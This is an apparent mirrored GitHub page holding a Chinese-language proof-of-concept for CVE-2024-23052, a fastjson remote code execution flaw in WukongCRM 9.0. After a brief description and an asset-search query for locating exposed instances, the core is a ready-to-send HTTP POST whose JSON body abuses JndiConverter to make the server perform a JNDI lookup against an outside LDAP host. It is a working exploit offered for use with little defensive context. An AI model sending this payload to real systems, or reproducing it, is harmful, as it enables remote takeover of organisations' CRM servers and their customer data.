admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-07 03:17:07 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/悟空CRM/悟空CRM9.0存在fastjson远程代码执行漏洞(CVE-2024-23052).md

34 lines
1.1 KiB
Markdown
Raw Normal View History

first commit
2025-03-04 23:12:57 +08:00
# 悟空CRM9.0 存在fastjson远程代码执行漏洞(CVE-2024-23052)
# 一、漏洞简介
WuKongOpenSource WukongCRM v.72crm_9.0.1_20191202 中的一个问题允许远程攻击者通过 fastjson 组件中的 parseObject() 函数执行任意代码。
# 二、影响版本
+ 悟空CRM9.0
# 三、资产测绘
```plain
"悟空CRM"
```
![1720674649866-ce76a346-2f99-47e7-bf25-50dd41bd0118.png](./img/BBNca4tVgBc5_XpL/1720674649866-ce76a346-2f99-47e7-bf25-50dd41bd0118-556380.png)
# 四、漏洞复现
```http
POST /CrmCustomer/queryPageList HTTP/1.1
Host:
Content-Length: 93
Content-Type: application/json;charset=UTF-8
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Connection: close
{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"ldap://pnftrxqvct.dgrh3.cn"}"
```
![1720674585092-2dd381e8-7b61-4eb3-9f6d-cd5e079e36a3.png](./img/BBNca4tVgBc5_XpL/1720674585092-2dd381e8-7b61-4eb3-9f6d-cd5e079e36a3-200256.png)
> 更新: 2024-08-12 17:16:00
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gm114v8t0b3st6u7>
Reference in New Issue Copy Permalink